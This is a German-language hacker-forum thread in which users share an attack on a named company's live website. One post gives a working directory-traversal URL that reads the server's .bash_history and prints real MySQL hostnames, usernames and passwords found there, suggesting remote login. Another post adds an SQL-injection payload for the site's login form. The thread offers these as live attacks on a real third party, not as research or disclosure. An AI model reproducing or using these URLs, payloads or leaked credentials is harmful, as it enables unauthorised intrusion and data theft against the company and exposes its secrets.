Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[LFI] Hagebau.com

- - - - - lfi

  • Bitte melde dich an um zu Antworten
4 Antworten in diesem Thema

#1
Klaus

Klaus

    Hacktivist

  • Banned
  • PIPPIPPIPPIPPIP
  • Likes
    34
  • 59 Beiträge
  • 22 Bedankt
  • Android, Android [root]
  • Windows, Linux

Viel spaß!

 

Please Login HERE or Register HERE to see this link!

 

:)


  • hacked, SecurityFlaw und Mini Rick gefällt das

Thanked by 1 Member:
killer555

#2
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android [root]
  • Windows, Linux

In der .bash_history stehen auch ein paar interessante Dinge.

URL:

https://transporter.hagebau.com/index.php?site=../../../../.bash_history%00

Beispiel:

mysqldump -h ah-siebrecht.de -u db190100_98 -phag0114Si "db190100_98" > transporter.sql
mysqldump -h mysql5.ah-siebrecht.de -u db190100_98 -phag0114Si "db190100_98" > transporter.sql
mysql -h mysql5.ah-siebrecht.de -u db190100_115 -pGHz8S6Qn --default-character-set=utf8 "db190100_115" < transport.sql
mysql -h mysql5.ah-siebrecht.de -u db190100_115 -pGHz8S6Qn --default-character-set=utf8 "db190100_115" < transporter.sql

Das sind Zugangsdaten zu einer MySQL-Datenbank. Vielleicht besteht die Möglichkeit sich extern einzuloggen.

Im Verzeichnis "./sqladmin" findet man zwar einen phpMyAdmin-Login aber für den braucht man laut Domainfactory das Kundenmenüpasswort.


  • Klaus gefällt das

#3
Klaus

Klaus

    Hacktivist

  • Banned
  • PIPPIPPIPPIPPIP
  • Likes
    34
  • 59 Beiträge
  • 22 Bedankt
  • Android, Android [root]
  • Windows, Linux

Interessant. Ich habe weiter keine Ahnung von LFI's. Leider. :D



#4
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    211
  • 219 Beiträge
  • 183 Bedankt

Übersehe ich hier was oder ist das keine inlcusion sondern ein Directory Traversal?



#5
SecurityFlaw

SecurityFlaw

    ██████████

  • Members
  • PIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    212
  • 256 Beiträge
  • 112 Bedankt
  • Android, Android [root]
  • Windows, Linux

Falls die DB keinen externen Zugriff zulässt könnte man es hier auch noch versuchen.

 

SQLI:

https://transporter.hagebau.com/index.php?site=login | POST: loginname=xxx123'&password=xxx123&submit_login=anmelden

Bearbeitet von SecurityFlaw, 26 August 2017 - 23:11 Uhr.

  • Klaus gefällt das



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


Dieses Thema wurde von 60 Mitglied(ern) gelesen


    13fuckthepolice12, 3eyes, aaaaaa, abuleyla, aleks, B1nary, Bulldogge67, clusterhead, CM1, Cryptologic, decent, dep0x, desmond, Dr. Spic, dvalar, elcapitano, Elvisss, Exynos, FatalityMods, Framerater, Franziskaner, gtawelt, hacked, Hansiberg, Haxlor, Haxor33, heycaptain, JohnR, KimJongun, Klaus, kleinkriminell, L!x, Laggy, leonalexkraus, lolorollo, Makiavelic, malicious, MarkSantos, mesagio, Mini Rick, most_uniQue, nibble nibble, p.samson, PadX18, PaulaAbdul, Payload, PHIPU, ProHex, Psykoon303, Schax, SecurityFlaw, SepaX, sitb, Snapfish, SonnyBlack, syncing, TuttiFrutti, VerZus, Zero-X, Zerobyte
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.